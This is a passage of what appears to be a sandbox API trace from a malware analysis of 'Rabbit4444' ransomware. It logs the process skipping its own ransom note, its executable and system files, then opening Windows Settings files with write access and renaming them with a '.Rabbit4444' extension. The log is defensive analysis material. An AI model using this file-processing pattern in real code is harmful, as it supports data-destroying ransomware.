cFileName="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", cAlternateFileName="AA70B8~1.SET")) returned 1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2=".") returned 1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2="..") returned 1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2="windows") returned -1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2="boot") returned -1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.967] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.967] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms" | out: lpString1="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms") returned="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms" [0057.967] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Preference.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.968] lstrlenW (lpString="AAA_SystemSettings_ShellMode_Preference.settingcontent-ms") returned 57 [0057.968] lstrlenW (lpString="Rabbit4444") returned 10 [0057.968] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.968] lstrlenW (lpString=".dll") returned 4 [0057.968] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.968] lstrlenW (lpString=".lnk") returned 4 [0057.968] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.968] lstrlenW (lpString=".ini") returned 4 [0057.968] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.968] lstrlenW (lpString=".sys") returned 4 [0057.968] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.968] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Preference.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_preference.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.968] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.968] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14927914120) returned 1 [0057.968] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1231) returned 1 [0057.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.969] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0057.969] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.973] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.974] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14928510270) returned 1 [0057.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0057.974] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.975] CloseHandle (hObject=0x298) returned 1 [0057.975] CloseHandle (hObject=0x278) returned 1 [0057.975] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Preference.settingcontent-ms.Rabbit4444") returned 185 [0057.975] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Preference.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_preference.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Preference.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_preference.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.975] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x384b4aea, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x384b4aea, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x506, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", cAlternateFileName="AA94FF~1.SET")) returned 1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2=".") returned 1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2="..") returned 1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2="windows") returned -1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2="boot") returned -1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.976] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.976] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms" | out: lpString1="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms") returned="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms" [0057.976] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.976] lstrlenW (lpString="AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms") returned 68 [0057.976] lstrlenW (lpString="Rabbit4444") returned 10 [0057.976] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.976] lstrlenW (lpString=".dll") returned 4 [0057.976] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.976] lstrlenW (lpString=".lnk") returned 4 [0057.976] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.976] lstrlenW (lpString=".ini") returned 4 [0057.976] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.976] lstrlenW (lpString=".sys") returned 4 [0057.976] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.976] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_taskbarappsvisibility.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.977] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.977] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14928752598) returned 1 [0057.977] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1286) returned 1 [0057.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0057.977] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.978] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.979] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14929001155) returned 1 [0057.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0057.979] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.979] CloseHandle (hObject=0x298) returned 1 [0057.980] CloseHandle (hObject=0x278) returned 1 [0057.980] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms.Rabbit4444") returned 196 [0057.980] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_taskbarappsvisibility.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_taskbarappsvisibility.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.980] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3899de22, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3899de22, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", cAlternateFileName="AA793F~1.SET")) returned 1 [0057.980] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.980] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.981] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.981] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2=".") returned 1 [0057.981] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2="..") returned 1 [0057.981] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2="windows") returned -1 [0057.981] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.981] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.981] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2="boot") returned -1 [0057.981] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.981] lstrcmpiW (lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.981] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms" | out: lpString1="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms") returned="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms" [0057.981] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.981] lstrlenW (lpString="AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms") returned 53 [0057.981] lstrlenW (lpString="Rabbit4444") returned 10 [0057.981] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.981] lstrlenW (lpString=".dll") returned 4 [0057.981] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.981] lstrlenW (lpString=".lnk") returned 4 [0057.981] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.981] lstrlenW (lpString=".ini") returned 4 [0057.981] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.981] lstrlenW (lpString=".sys") returned 4 [0057.981] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.981] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_toggle.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.982] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.982] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14929243789) returned 1 [0057.982] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1211) returned 1 [0057.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.982] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0057.983] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0057.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.984] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14929521236) returned 1 [0057.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.985] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.985] CloseHandle (hObject=0x298) returned 1 [0057.985] CloseHandle (hObject=0x278) returned 1 [0057.985] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms.Rabbit4444") returned 181 [0057.985] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_toggle.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_shellmode_toggle.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.986] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39183add, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x39183add, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", cAlternateFileName="AAA4C1~1.SET")) returned 1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2=".") returned 1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2="..") returned 1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2="windows") returned -1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2="boot") returned -1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.986] lstrcmpiW (lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.986] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms") returned="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms" [0057.986] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.987] lstrlenW (lpString="AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms") returned 60 [0057.987] lstrlenW (lpString="Rabbit4444") returned 10 [0057.987] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.987] lstrlenW (lpString=".dll") returned 4 [0057.987] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.987] lstrlenW (lpString=".lnk") returned 4 [0057.987] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.987] lstrlenW (lpString=".ini") returned 4 [0057.987] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.987] lstrlenW (lpString=".sys") returned 4 [0057.987] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.987] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_startup_advancedstartup.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.987] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.987] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14929805667) returned 1 [0057.987] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1263) returned 1 [0057.987] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0057.987] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.987] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.988] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.989] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 